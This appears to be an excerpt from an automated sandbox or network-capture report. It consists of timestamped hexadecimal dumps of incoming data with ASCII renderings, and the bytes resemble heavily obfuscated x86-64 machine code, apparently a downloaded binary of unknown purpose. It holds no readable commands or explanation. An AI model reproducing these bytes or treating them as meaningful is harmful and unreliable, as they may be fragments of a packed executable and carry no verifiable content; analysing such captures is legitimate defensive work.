                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15288INData Raw: cc 44 8b 0b 45 84 f0 48 81 f9 f9 1a 47 4d f9 45 33 ca 41 f7 d9 41 81 c1 53 34 87 39 f5 41 0f c9 f9 41 d1 c1 e9 57 1c 05 00 0f 86 14 00 00 00 ba 04 00 00 00 0f c8 66 81 ff 04 7e 8d 4b fc 66 44 0f a3 e0 c1 e1 03 66 0f ba f8 0a c1 e2 03 66 0f ac e8 03 66 44 0f ab c0 48 8b c5 4d 3b e5 48 03 c2 45 84 ff e9 0a de 08 00 41 ff c2 e9 37 d9 f6 ff f8 81 f7 f7 3f 0d 1b f9 f5 c1 c7 02 f7 df e9 e0 99 09 00 0f 85 95 fd 07 00 48 8b 44 25 00 41 80 f9 9b 48 81 ec 20 00 00 00 ff d0 48 8b 64 25 f0 d2 c7 4c 63 cb 48 c1 c6 91 48 8b 6c 25 f8 0f b7 fe d2 ff 40 f6 c7 1b 48 89 44 25 00 4c 8b d5 41 02 dc 40 80 d7 5b 85 c4 5b 66 c1 fe 7f 4d 0f b7 cf 41 59 40 22 ff 5e 66 41 0f b6 f8 8b 3e 48 81 c6 04 00 00 00 e9 33 57 04 00 0f c8 ff c8 0f c8 41 3b e2 66 41 85 f6 05 60 5b d4 50 f8 41
                                                                                                                                                                                                                                    Data Ascii: DEHGME3AAS49AAWf~KfDfffDHM;HEA7?HD%AH Hd%LcHHl%@HD%LA@[[fMAY@"^fA>H3WA;fA`[PA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15304INData Raw: af b8 7b e2 36 2e 4b e5 41 8d de 81 df 1b ee 86 a8 a1 bf 8f 31 37 8f 88 46 c2 82 80 cb 54 b2 87 bc ee e3 8e 25 78 d3 89 52 db 46 ed cc 4d 76 ea bb f7 27 e3 22 61 17 e4 55 f0 0a 5b c5 66 3a 5c b2 dc 6b 55 2b 4a 5b 52 5c e9 ce 36 c2 7f fe 31 b5 c5 af 38 2c 53 9f 3f 5b 6e b2 59 ed f8 82 5e 9a 42 d3 57 03 d4 e3 50 74 77 76 34 ea e1 46 33 9d 5b 17 3a 04 cd 27 3d 73 5c 3a 82 e3 ca 0a 85 94 70 5b 8c 0d e6 6b 8b 7a 45 fe ef e4 d3 ce e8 93 69 9f e1 0a ff af e6 7d 0a a2 ee f0 9c 92 e9 87 26 c3 e0 1e b0 f3 e7 69 13 66 83 f7 85 56 84 80 3f 07 8d 19 a9 37 8a 6e 38 2a 35 fe ae 1a 32 89 14 4b 3b 10 82 7b 3c 67 21 ee 58 f9 b7 de 5f 8e 0d 8f 56 17 9b bf 51 60 36 d3 eb a0 a0 e3 ec d7 1a b2 e5 4e 8c 82 e2 39 2f 17 86 a7 b9 27 81 d0 03 76 88 49 95 46 8f 3e 04 5b 30 ae 92 6b
                                                                                                                                                                                                                                    Data Ascii: {6.KA17FT%xRFMv'"aU[f:\kU+J[R\618,S?[nY^BWPtwv4F3[:'=s\:p[kzEi}&ifV?7n8*52K;{<g!X_VQ`6N9/'vIF>[0k
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15320INData Raw: 2b e1 48 81 e4 f0 ff ff ff 48 3b ed 48 03 e1 f5 85 db 0f 84 ee c6 f6 ff 48 8b 44 dd 00 81 fb 01 00 00 00 e9 80 06 f8 ff e9 0a 24 02 00 49 8b 13 66 0f a3 f5 40 02 ee 66 41 8b 6b 08 4d 3b f0 f5 45 84 f7 49 81 c3 0a 00 00 00 41 80 f9 d8 f8 36 66 89 2a 0f ca 66 c1 fa 69 49 0f 42 d1 49 81 ea 04 00 00 00 41 8b 12 41 33 d1 f9 e9 29 91 fc ff e9 d2 73 fc ff 66 85 f2 57 31 34 24 0f cf 40 2a fd 48 0f ba f7 09 5f 49 81 fd 36 13 d0 70 f5 48 63 f6 f9 f5 4c 03 de e9 16 20 00 00 66 d3 ce 48 81 eb 04 00 00 00 8b 33 e9 09 bf fe ff e9 95 73 fc ff 49 8b 08 41 8b 70 08 66 41 c1 f3 54 4c 33 dd 66 44 0f bd df 49 81 c0 0c 00 00 00 36 89 31 49 c1 fb b5 66 45 0f bc dc 41 c0 f3 b6 49 81 e9 04 00 00 00 45 0a db 44 32 d8 41 d2 cb 45 8b 19 44 33 df f9 e9 c5 70 f9 ff 49 8b 13 66 0b ec
                                                                                                                                                                                                                                    Data Ascii: +HH;HHD$If@fAkM;EIA6f*fiIBIAA3)sfW14$@*H_I6pHcL fH3sIApfATL3fDI61IfEAIED2AED3pIf
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15336INData Raw: 81 f2 08 79 41 5a 48 63 c0 f9 48 03 f0 e9 83 51 06 00 e9 62 13 08 00 41 ff cb 41 81 f3 78 08 92 0c 55 66 41 13 e9 44 31 1c 24 f8 44 0f ab ed 5d 4d 63 db 49 03 f3 56 c3 48 f7 d6 41 0f 42 f2 9c 40 c0 d6 62 41 8f 01 66 41 0b f3 40 12 f0 41 80 fa 13 48 81 ed 04 00 00 00 8b 74 25 00 33 f7 e9 8b 6f 00 00 41 0f c8 e9 83 91 f5 ff e9 32 4c 04 00 e9 75 a7 fc ff 4d 03 d8 e9 e0 41 08 00 f5 41 53 49 81 e3 66 5a f3 24 41 0f cb 31 04 24 45 1a df 41 c0 c3 90 66 41 0f bb eb 41 5b 4d 85 e9 48 63 c0 48 03 e8 e9 52 8a 04 00 45 8b 18 41 12 ca 87 db 66 44 0f a3 fb 41 8a 48 04 48 63 de 0f bb db f8 49 81 e8 06 00 00 00 66 0f bd d9 e9 52 63 01 00 48 8b 2b 41 3b d1 49 0f ba e3 cc 4c 8b 5b 08 d2 c1 02 c9 8a 4b 10 f9 f8 40 80 ff c3 48 81 c3 02 00 00 00 f9 45 3b c9 4c 0f ad dd 48 89
                                                                                                                                                                                                                                    Data Ascii: yAZHcHQbAAxUfAD1$D]McIVHAB@bAfA@AHt%3oA2LuMAASIfZ$A1$EAfAA[MHcHREAfDAHHcIfRcH+A;IL[K@HE;LH
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15352INData Raw: 00 00 00 48 8b df 41 8b 1a f9 f5 33 de f9 f5 e9 35 29 fb ff ff c1 66 41 81 fe 56 38 0f c9 f5 57 40 c0 c7 87 31 0c 24 66 c1 cf 95 40 80 ef 64 0f bd f8 5f 66 45 85 ed 48 63 c9 f8 41 3a f8 4c 03 c1 e9 33 d3 07 00 57 41 0f bc fc 81 f7 66 0e fe 08 66 bf 88 1c 31 14 24 48 0f ab cf 5f e9 86 e2 02 00 40 80 fe 45 f7 d8 e9 b8 c1 04 00 48 03 f7 e9 a4 af 01 00 e9 ff d2 07 00 55 c3 ff c5 48 81 fa 02 0e 52 2a f5 66 45 3b d3 57 66 81 df 6f 76 66 0f bc f9 31 2c 24 40 80 ef 29 5f 48 63 ed 41 f6 c0 fe f8 41 80 fa 4e 4c 03 d5 e9 f2 32 03 00 ff c1 57 31 0c 24 40 b7 17 5f 66 41 81 fc 3c 13 f8 48 63 c9 4c 03 d9 e9 cc 61 fa ff 49 89 43 08 66 98 e9 8e 0a 07 00 e9 74 c3 fd ff 0f 85 9a 57 f8 ff 48 8b 44 25 00 f5 48 81 ec 20 00 00 00 e9 fb c5 06 00 8d 4b fc 49 0f bd c7 d2 f4 c1 e1
                                                                                                                                                                                                                                    Data Ascii: HA35)fAV8W@1$f@d_fEHcA:L3WAff1$H_@EHUHR*fE;Wfovf1,$@)_HcAANL2W1$@_fA<HcLaICftWHD%H KI
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15368INData Raw: e9 26 a6 06 00 45 84 ea f8 81 c5 63 77 9d 64 d1 c5 66 45 3b d3 f9 57 48 0f b3 ff 40 d2 ef 40 d2 ff 31 2c 24 66 0f 4c f9 48 d3 ef 5f 45 84 c8 48 63 ed 4c 03 d5 e9 69 cc 03 00 41 ff 33 49 81 c3 08 00 00 00 66 81 e5 13 31 e9 66 12 04 00 66 41 89 43 08 9c 45 0f ac e9 16 41 c0 c9 bc 41 8f 03 41 c0 c1 ce 66 41 81 f1 14 27 48 81 eb 04 00 00 00 41 c0 e1 95 41 d2 c9 44 8b 0b 80 fe 98 f8 44 33 cf 44 3b ee 41 80 f8 5c f5 41 81 c1 e0 4a 4f 11 66 81 fa 58 54 41 f7 d9 41 ff c1 41 c1 c1 02 57 44 31 0c 24 5f e9 08 5a f7 ff 48 63 f6 4c 03 c6 e9 c1 4a fe ff 0f c9 f5 41 3b d7 f7 d1 f8 57 31 0c 24 49 0f b7 fb 5f 66 44 85 ed 81 fa 2f 61 44 13 48 3b da 48 63 c9 49 81 fd 81 1d 9c 5a f9 4c 03 c1 e9 91 92 07 00 4c 85 e1 f8 4c 03 c6 e9 42 d8 ff ff e9 80 92 07 00 41 33 f9 c1 c7 02
                                                                                                                                                                                                                                    Data Ascii: &EcwdfE;WH@@1,$fLH_EHcLiA3If1ffACEAAAfA'HAADD3D;A\AJOfXTAAAWD1$_ZHcLJA;W1$I_fD/aDH;HcIZLLLBA3
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15384INData Raw: f8 33 ef 66 44 85 cb f5 f8 f7 d5 f7 dd d1 cd f7 d5 66 44 3b e1 57 40 86 ff 40 d2 df 49 33 fc 31 2c 24 0f bd f8 81 f7 b3 46 78 00 5f f9 41 84 d7 48 63 ed 41 f6 c4 f0 41 84 ca 4c 03 c5 e9 eb 8a ff ff 0f 31 41 0a cd 66 0f ba e1 9c 49 81 eb 08 00 00 00 22 ee 0b c9 41 89 13 d2 c1 66 44 0f a3 f9 41 89 43 04 86 cd 66 c1 e1 e2 81 d1 19 49 d0 08 48 81 eb 04 00 00 00 8b 0b 33 cf f5 f7 d9 f9 d1 c9 44 85 e9 f5 f7 d1 f7 d9 57 40 0a f8 31 0c 24 41 0f bf fe 66 81 df ba 03 66 44 0f ab df 5f 48 63 c9 66 85 c3 f9 45 3a e3 4c 03 c1 e9 a6 52 fd ff 41 0f c8 e9 3c bf 07 00 f7 d5 e9 fa 43 08 00 f9 81 c5 53 35 6c 77 56 40 d2 ee 48 d3 d6 0f ac ce c5 31 2c 24 f7 d6 48 0f b7 f4 5e 48 81 fa 0c 54 bb 18 f9 48 63 ed 4c 03 cd e9 4b 32 fc ff 0f 85 7e 59 00 00 48 8b d0 e9 b7 d1 f7 ff ff
                                                                                                                                                                                                                                    Data Ascii: 3fDfD;W@@I31,$Fx_AHcAAL1AfI"AfDACfIH3DW@1$AffD_HcfE:LRA<CS5lwV@H1,$H^HTHcLK2~YH
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15400INData Raw: 8b 29 33 ef f8 f7 d5 e9 6f ee fb ff 0f 85 24 6b f7 ff 48 8b c8 e9 92 2b 00 00 f8 41 f7 d2 41 d1 ca e9 e6 2a 01 00 49 8b 13 41 f6 d0 66 44 0f be c5 41 80 e0 d2 41 8a 43 08 49 81 c3 0a 00 00 00 66 45 0f bd c1 66 41 ff c8 36 88 02 44 22 c6 49 81 ea 04 00 00 00 41 80 e0 ac 44 03 c6 45 8b 02 e9 07 83 04 00 e9 eb e9 f4 ff 0f 31 41 c0 d8 86 49 81 eb 08 00 00 00 41 89 13 41 c0 e8 a5 41 89 43 04 49 d3 d0 49 d3 e8 40 84 fd 49 81 ea 04 00 00 00 66 44 0b c0 45 8b 02 44 33 c6 f8 f5 41 d1 c8 f8 41 0f c8 e9 68 33 02 00 49 81 c0 06 00 00 00 f8 66 41 89 28 49 81 e9 04 00 00 00 40 c0 d5 f0 66 0f b6 eb 41 8b 29 33 ef f7 d5 f7 dd f8 e9 aa 96 07 00 49 81 e9 01 00 00 00 66 44 0f bd df 45 84 d5 45 0f b6 19 fe c4 44 32 df 41 d0 cb 66 d3 d0 41 f6 db 66 98 41 fe c3 66 0f ba f0 c0
                                                                                                                                                                                                                                    Data Ascii: )3o$kH+AA*IAfDAACIfEfA6D"IADE1AIAAACII@IfDED3AAh3IfA(I@fA)3IfDEED2AfAfAf
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15416INData Raw: ce e9 26 9a 03 00 ff c5 41 84 e0 f7 dd f9 f8 81 ed e6 75 16 31 f5 66 41 81 fd 7e 55 f7 d5 e9 03 d2 04 00 f8 f5 d1 c1 f8 49 81 fc d9 7b e1 33 41 52 49 d3 e2 4c 63 d3 31 0c 24 41 0f 9b c2 66 45 0f bd d6 f9 41 5a f5 80 fa 51 48 63 c9 f9 f6 c6 3a 66 41 85 c2 48 03 f1 e9 97 a7 fb ff e9 3e b4 00 00 ff c2 f9 41 3b c8 f5 f7 d2 66 41 81 f8 f3 2d 53 40 0a dd 31 14 24 66 c1 c3 d5 0f ba fb 8b 5b e9 a1 dc 01 00 f9 c1 c8 02 ff c8 f9 d1 c8 41 51 41 d2 e9 31 04 24 41 c0 c9 09 41 59 66 45 85 c8 f5 48 63 c0 48 03 f0 e9 92 5f fd ff 55 c3 41 8b 12 45 32 c3 45 1b c7 44 0f c0 c1 41 8a 4a 04 66 41 c1 d8 ee 66 45 0f bd c6 49 81 ea 06 00 00 00 d3 ea 41 89 52 08 66 41 0f c8 66 45 8b c2 9c 40 80 fe 1d 41 8f 02 41 c1 f0 63 44 8b 06 41 f6 c1 95 48 81 c6 04 00 00 00 49 85 ca 44 33 c3
                                                                                                                                                                                                                                    Data Ascii: &Au1fA~UI{3ARILc1$AfEAZQHc:fAH>A;fA-S@1$f[AQA1$AAYfEHcH_UAE2EDAJfAfEIARfAfE@AAcDAHID3
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15432INData Raw: ff c8 41 3a ca 66 41 81 f8 d1 5b f5 f7 d8 e9 a6 b3 04 00 e9 8b cc 02 00 41 ff c0 e9 39 f8 f9 ff 48 8b 07 4d 0f bb c2 4c 8b 57 08 49 03 c2 41 8a d8 f6 d7 66 41 0f be dd 48 89 47 08 66 f7 d3 9c d2 cb 44 84 d7 8f 07 66 0f ba f3 37 0f b3 cb 48 c1 cb 7b 8b 1e f6 c3 ad 48 81 c6 04 00 00 00 f8 41 33 db e9 e8 d1 03 00 45 84 f6 40 80 fc 8b 4d 63 db 49 03 f3 e9 64 42 fe ff 66 41 81 fb 21 72 f5 48 63 d2 40 84 e1 44 3b e2 4c 03 d2 e9 89 9f fe ff 49 81 e9 01 00 00 00 66 81 ee 32 44 45 0f b6 19 40 80 ee 85 44 32 df 0f ba f5 4e 41 d0 cb 41 f6 db 66 0f ce 41 fe c3 66 d3 dd 48 0f b7 ec 40 0f 95 c6 41 f6 d3 0f a3 e5 41 d0 c3 41 80 eb 4f f5 49 0b ea 66 f7 de 41 80 f3 32 48 0f b7 ea 66 44 0f a3 d6 40 fe c6 41 32 fb 66 81 d6 19 66 66 42 8b 34 1c 49 81 e8 02 00 00 00 66 81 dd
                                                                                                                                                                                                                                    Data Ascii: A:fA[A9HMLWIAfAHGfDf7H{HA3E@McIdBfA!rHc@D;LIf2DE@D2NAAfAfH@AAAOIfA2HfD@A2fffB4If
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15448INData Raw: fa 1b 41 0f bf c6 80 dc 3b 66 41 d3 e3 48 0f bf c2 66 45 89 5a 08 0f 9d c4 41 0f bf c0 9c c1 c8 a2 41 0f bf c0 41 8f 02 66 41 8b c5 86 c0 8b 06 45 85 d6 48 81 c6 04 00 00 00 33 c3 f5 d1 c0 f8 66 44 3b c4 35 72 46 87 14 e9 2f ee fa ff 41 ff ca 41 81 f2 2b 1f 9c 61 f5 e9 c8 f3 01 00 49 81 ea 08 00 00 00 48 81 cf 17 74 7f 7f 66 41 8b fe 48 f7 e2 41 8a f8 48 0f b7 f8 49 89 52 08 48 0f cf 48 8b fe 49 89 42 10 66 bf b5 1b 66 40 0f b6 fe 41 0f bf f8 9c 41 8f 02 40 f6 df 40 c0 ff 8d 8b 3e 48 81 c6 04 00 00 00 e9 d9 31 02 00 41 33 ca f5 0f c9 f5 81 c1 67 06 cf 2a f7 d1 81 e9 27 06 f9 78 41 f6 c3 ff f9 41 52 41 d3 fa 31 0c 24 41 5a f8 48 63 c9 48 03 f1 e9 76 f8 fb ff f8 49 81 ea 04 00 00 00 41 8b 3a f5 f8 33 fe f9 c1 cf 03 66 45 3b fa f7 d7 81 fc 41 2a 78 6d 81 f7
                                                                                                                                                                                                                                    Data Ascii: A;fAHfEZAAAfAEH3fD;5rF/AA+aIHtfAHAHIRHHIBff@AA@@>H1A3g*'xAARA1$AZHcHvIA:3fE;A*xm
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15464INData Raw: ce ff c6 f8 f9 57 40 d2 c7 40 c0 c7 3e 40 d2 df 31 34 24 66 0f a3 ff 5f 48 63 f6 66 45 85 d2 49 81 fd 22 7d 22 2f f8 4c 03 de e9 0d 21 06 00 f5 41 f7 db 66 f7 c5 b1 45 f5 53 44 31 1c 24 5b e9 25 7b f8 ff 49 81 ea 08 00 00 00 66 44 0f a3 c5 40 d2 fd c0 ee d9 49 8b 12 40 80 d5 a5 41 1b ea 66 41 0f bd ec 48 33 d6 ff c5 40 c0 e5 2a 48 f7 da 48 0f ba e5 21 48 81 c2 8e 2c 57 4f 40 c0 cd bd 66 0f ba f5 96 48 c1 c2 04 66 41 0f 4d ea 48 ff ca 41 0f bf ef 66 c1 f5 38 48 33 f2 49 81 eb 08 00 00 00 f8 49 89 13 66 23 ef 48 0f a4 e5 6e 49 81 ea 04 00 00 00 41 8b 2a 66 44 3b e6 33 ee 41 80 fe 53 f9 81 f5 d7 11 7e 2a e9 b5 29 01 00 e9 62 e3 ff ff f9 f7 d2 e9 5a fd 00 00 8b d8 99 8b d3 41 f6 c0 19 f9 33 c9 f9 e9 24 78 04 00 49 81 ea 01 00 00 00 41 0f b6 12 49 0f bd c4 9f
                                                                                                                                                                                                                                    Data Ascii: W@@>@14$f_HcfEI"}"/L!AfESD1$[%{IfD@I@AfAH3@*HH!H,WO@fHfAMHAf8H3IIf#HnIA*fD;3AS~*)bZA3$xIAI
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15480INData Raw: b6 05 48 81 c7 04 00 00 00 66 41 3b c5 41 33 c1 35 25 15 b1 40 f8 f9 c1 c0 03 e9 43 d7 04 00 f7 dd f8 41 51 41 80 e9 e6 31 2c 24 66 45 0f bd cd 41 59 84 de f9 48 63 ed 66 41 f7 c5 87 31 66 41 3b ec 48 03 f5 e9 7d c8 f9 ff 48 03 f1 e9 f5 f3 f9 ff 44 8b 17 40 80 ff f5 8b 57 04 8a 4f 08 48 81 ef 02 00 00 00 66 81 ff f2 57 f9 41 0f ad d2 44 89 57 08 0f 91 c1 49 0f bf c8 9c c0 e1 e0 66 d3 e9 8f 07 48 87 c9 d3 d9 48 81 f9 71 16 89 31 8b 0b f5 f8 48 81 c3 04 00 00 00 41 f6 c4 1a 41 80 ff 24 33 cd f8 81 e9 9b 26 3e 39 e9 e8 36 04 00 41 ff c1 f9 f8 41 52 e9 5e 2f fa ff ff c1 f5 53 0f 90 c3 31 0c 24 44 0f ac c3 08 c0 e7 30 66 ff c3 5b 49 85 d8 66 a9 c2 5b 48 63 c9 4c 03 c9 41 ff e1 41 ff c0 57 44 31 04 24 44 0f bb f7 40 80 cf cc 40 d2 ff 5f 4d 63 c0 f5 f9 3a f1 4d
                                                                                                                                                                                                                                    Data Ascii: HfA;A35%@CAQA1,$fEAYHcfA1fA;H}HD@WOHfWADWIfHHq1HAA$3&>96AAR^/S1$D0f[If[HcLAAWD1$D@@_Mc:M
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15496INData Raw: d2 49 89 71 08 0f bf d6 9c 41 8f 01 c0 e2 75 66 41 1b d2 66 0f ba f2 cd 48 81 ed 04 00 00 00 8b 54 25 00 33 d7 f8 81 f2 ec 60 d9 6d f7 da c1 c2 02 f7 d2 f5 57 45 84 d5 31 14 24 5f e9 ff 97 00 00 ff c7 f8 f6 c6 bf 41 80 f9 26 f7 df f8 53 0f c0 db 48 d3 fb fe cf 31 3c 24 49 0f b7 db f9 5b 48 63 ff e9 2d 73 fc ff 49 03 f2 e9 7a 76 fa ff 55 66 33 ec 44 31 04 24 41 12 ea 66 f7 d5 5d 66 41 3b e7 f8 4d 63 c0 f5 49 03 f0 e9 a7 63 ff ff 48 03 e8 e9 22 f7 01 00 41 ff e2 f9 d1 c9 81 e9 55 3d 88 12 81 f1 bc 28 41 59 e9 c2 7c fb ff 48 03 f1 e9 15 e0 f7 ff 49 8b 18 40 f6 d7 49 81 c0 08 00 00 00 49 0f 42 fe 40 0f 9e c7 49 8b f8 e9 1a 76 fb ff 41 51 c3 48 ff cb e9 20 d4 f3 ff f7 d5 e9 b0 19 06 00 e9 00 27 fa ff ff e6 4c 8b 13 41 c0 e3 a8 4c 8b 5b 08 41 81 fe 5e 66 99 3c
                                                                                                                                                                                                                                    Data Ascii: IqAufAfHT%3`mWE1$_A&SH1<$I[Hc-sIzvUf3D1$Af]fA;McIcH"AU=(AY|HI@IIB@IvAQH 'LAL[A^f<
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15512INData Raw: 81 e9 01 00 00 00 48 0f ab fb 41 0f b6 19 44 22 df 40 32 df fe c3 41 c0 fb f8 f6 d3 66 44 0b d8 49 0f ab db 80 f3 a3 66 81 ff 98 48 66 45 0b d8 66 41 f7 c2 5f 72 80 eb 4c d0 cb f6 db 66 45 0f be dc 4d 8b db fe cb 41 80 f3 72 41 ff c3 41 c0 db a9 40 32 fb 89 34 1c 49 81 e9 04 00 00 00 66 41 0f ba e3 b4 66 41 c1 fb 1c 44 0f bf df 45 8b 19 45 84 cb 44 33 df e9 5d ed f2 ff 0f ce 81 c6 b0 7e 8d 55 f9 d1 c6 57 0f c1 ff 40 1a fd 41 22 fa 31 34 24 40 1a fd 81 f7 7d 5b 92 79 40 84 cc 5f f7 c2 0c 7d e7 26 48 63 f6 4c 03 d6 e9 42 74 02 00 66 3b e3 f7 d8 e9 89 55 f8 ff ff cd f5 f7 dd 45 3b f5 66 44 85 f5 81 f5 4c 34 59 1e 81 ed 26 29 74 78 c1 c5 03 53 31 2c 24 48 0f b7 dd 40 22 df 5b 40 f6 c6 13 48 63 ed 4c 03 cd e9 46 ca f6 ff 41 c1 c2 02 41 ff c2 41 f7 d2 41 d1 ca
                                                                                                                                                                                                                                    Data Ascii: HAD"@2AfDIfHfEfA_rLfEMArAA@24IfAfADEED3]~UW@A"14$@}[y@_}&HcLBtf;UE;fDL4Y&)txS1,$H@"[@HcLFAAAA
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15528INData Raw: 11 10 e2 07 88 86 d2 00 ff 25 47 64 61 b3 77 63 16 09 26 6a 8f 9f 16 6d f8 32 7a d7 38 a4 4a d0 4f 1e 1b d9 d6 88 2b de a1 2b be ba 3f bd 8e bd 48 07 df b4 d1 91 ef b3 a6 00 f2 0c 36 96 c2 0b 41 2c 93 02 d8 ba a3 05 af 19 36 61 31 8f 06 66 46 35 57 6f df a3 67 68 a8 56 6a 60 25 c0 5a 67 52 7a 0b 6e cb ec 3b 69 bc 4f ae 0d 22 d9 9e 0a 55 63 cf 03 cc f5 ff 04 bb 64 e2 bb 2b f2 d2 bc 5c 48 83 b5 c5 de b3 b2 b2 7d 26 d6 2c eb 16 d1 5b 51 47 d8 c2 c7 77 df b5 fa 5a b9 03 6c 6a be 74 d6 3b b7 ed 40 0b b0 9a e3 9e d4 04 75 ae d3 73 cf ff da ea 59 cf dd 9d c8 d2 62 0d 5e e2 65 7a e4 b3 6c e3 72 83 6b 94 d1 16 0f 0a 47 26 08 7d fd 77 01 e4 6b 47 06 93 9e 4a 0e 1e 08 7a 09 69 b2 2b 00 f0 24 1b 07 87 87 8e 63 19 11 be 64 6e ab ef 6d f7 3d df 6a 80 ac c2 d5 10 3a f2
                                                                                                                                                                                                                                    Data Ascii: %Gdawc&jm2z8JO++?H6A,6a1fF5WoghVj`%ZgRzn;iO"Ucd+\H}&,[QGwZljt;@usYb^ezlrkG&}wkGJzi+$cdnm=j:
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15544INData Raw: e9 74 4b 04 00 57 40 d2 ff 44 31 1c 24 66 0f b6 fa c1 f7 ac 5f f8 4d 63 db f8 4d 03 d3 e9 99 af fa ff e9 7c 0c 01 00 48 8b 07 48 f7 c6 10 60 6c 4b 44 8b 4f 08 66 44 0f ab ca 48 d3 ca 48 81 c7 0c 00 00 00 44 89 08 66 0f ab ea 8b 13 49 81 fe 96 72 13 18 44 85 dc 48 81 c3 04 00 00 00 e9 21 a8 fb ff 48 63 f6 4c 03 de 41 53 c3 f7 da e9 d3 ff fc ff 33 c7 c1 c8 02 ff c8 f9 d1 c0 e9 1e da ff ff ff ca e9 f3 61 f7 ff 48 63 d2 f9 48 03 f2 e9 9b 45 05 00 81 ef 9a 4a 07 30 f7 d7 d1 cf 0f cf 84 d0 81 c7 f6 65 47 4b 41 52 66 41 c1 fa 34 49 d3 ea 66 44 0f b6 d7 31 3c 24 66 41 0f a3 f2 41 5a f8 f5 48 63 ff 66 41 81 fa 29 26 f8 48 03 f7 e9 ca b3 fe ff 8b d9 80 fc f7 49 0f 4c d7 0f c0 d6 8b d3 33 c9 f5 66 45 3b f5 81 fb 04 00 00 00 e9 33 ff fb ff 49 8b 31 c0 fa a1 80 e2 97
                                                                                                                                                                                                                                    Data Ascii: tKW@D1$f_McM|HH`lKDOfDHHDfIrDH!HcLAS3aHcHEJ0eGKARfA4IfD1<$fAAZHcfA)&HIL3fE;3I1
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15560INData Raw: 00 f9 53 44 0f a4 e3 a6 44 31 1c 24 86 ff 5b 41 3a f2 f6 c6 99 e9 18 8a fd ff 44 8b 17 0f bf c3 44 8b 47 04 44 0f ac d8 d6 41 33 c2 44 0f a3 f0 48 81 ef 04 00 00 00 b0 37 48 0f ba f8 62 45 03 d0 48 0f b7 c4 44 89 57 08 9c 66 41 13 c5 8f 07 4c 0f a3 e8 66 8b c7 66 0b c0 8b 03 f9 e9 d6 4f 04 00 41 ff c9 f9 f5 41 53 44 31 0c 24 41 80 d3 98 41 bb c7 15 17 61 41 80 eb 15 41 5b 4d 63 c9 f5 49 03 e9 ff e5 0f c9 66 45 3b d0 44 85 ee 55 44 0f a3 dd 49 0f bf e9 48 0f ba e5 f7 31 0c 24 5d 66 44 3b f0 48 63 c9 f9 48 03 f1 e9 25 82 f3 ff 0f cb e9 00 a0 03 00 05 ae 1d f3 6d 49 3b f6 0f c8 f5 41 51 66 41 c1 f1 65 4c 0f 49 ca 66 41 0f b3 c9 31 04 24 4c 63 cd 41 59 f5 48 63 c0 66 85 fd 48 03 f0 e9 82 f4 f9 ff 48 85 cc f5 49 81 e8 06 00 00 00 40 d2 e6 f6 d1 41 0f b7 cf 66
                                                                                                                                                                                                                                    Data Ascii: SDD1$[A:DDGDA3DH7HbEHDWfALffOAASD1$AAaAA[McIfE;DUDIH1$]fD;HcH%mI;AQfAeLIfA1$LcAYHcfHHI@Af
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15576INData Raw: 84 0d fa 04 00 48 8b 44 dd 00 66 f7 c4 90 53 e9 63 cd ff ff c1 c8 02 66 f7 c2 cd 1d e9 c5 db ff ff c3 41 52 c3 41 8b 3a 41 8b 42 04 66 41 13 ed 49 0f bc ef 49 81 ea 04 00 00 00 03 f8 40 f6 d5 41 89 7a 08 e9 f1 9c f6 ff 41 f7 d8 e9 e4 4e fd ff c1 c0 03 f8 f7 c6 a9 79 95 72 2d 28 25 8f 29 f9 d1 c0 e9 a8 f8 f7 ff 41 ff c8 41 d1 c0 41 ff c8 f9 f5 41 c1 c0 03 48 85 d5 41 52 44 31 04 24 41 c0 fa 3c 44 22 d2 41 c0 da 04 41 5a 4d 63 c0 40 3a ec e9 7c a0 f5 ff f7 da f5 f9 f6 c2 a5 0f ca 55 48 c1 cd fa 31 14 24 40 c0 c5 4d 48 d3 dd 5d 48 63 d2 44 3a e5 48 03 f2 e9 59 c5 f1 ff 66 45 8b 1b 48 d3 db 49 81 ea 04 00 00 00 41 8b 1a f5 3b f6 f8 33 de f8 40 f6 c5 42 49 85 fa 81 f3 d5 1c 03 07 f8 f7 d3 e9 90 9e fc ff ff c8 f8 c1 c8 02 41 85 c9 05 b4 0b 01 76 44 3a de 41 f7
                                                                                                                                                                                                                                    Data Ascii: HDfScfARA:ABfAII@AzANyr-(%)AAAAHARD1$A<D"AAZMc@:|UH1$@MH]HcD:HYfEHIA;3@BIAvD:A
                                                                                                                                                                                                                                    2022-10-04 05:10:13 UTC15592INData Raw: 51 45 0f bb c1 4c 0f b7 c8 31 04 24 41 c0 f9 7f 66 41 c1 d9 c9 49 f7 d1 41 59 48 63 c0 f9 48 03 f0 e9 27 31 f6 ff 48 ff c0 41 80 f9 01 e9 cc b6 f5 ff ff c0 48 3b cf f7 d8 35 df 12 1f 48 66 41 3b fd e9 76 99 f5 ff 41 33 c9 e9 16 c4 ff ff 49 8b 1b 0f 9c c1 49 8b 53 08 c0 e9 a8 41 8a 4b 10 41 f6 c6 2a 49 81 c3 02 00 00 00 66 81 fc 93 06 48 0f a5 d3 e9 99 28 04 00 66 41 3b c3 f5 41 0f cb 66 81 fd 6e 2b 41 51 41 f7 c1 6f 62 75 13 44 0f 4c ca 66 45 0f bb f9 44 31 1c 24 4d 0f a3 e9 44 0f bc cf 49 0f a4 e1 77 41 59 4d 63 db 41 80 fc b2 49 03 f3 e9 c7 ad f1 ff ff c9 f5 f8 41 84 cb 0f c9 f7 d1 57 40 fe c7 66 44 0f ab ff 31 0c 24 5f 48 63 c9 f9 f5 4c 03 c1 e9 d5 15 01 00 f7 d1 f7 d9 66 f7 c6 4f 5c 41 51 31 0c 24 41 59 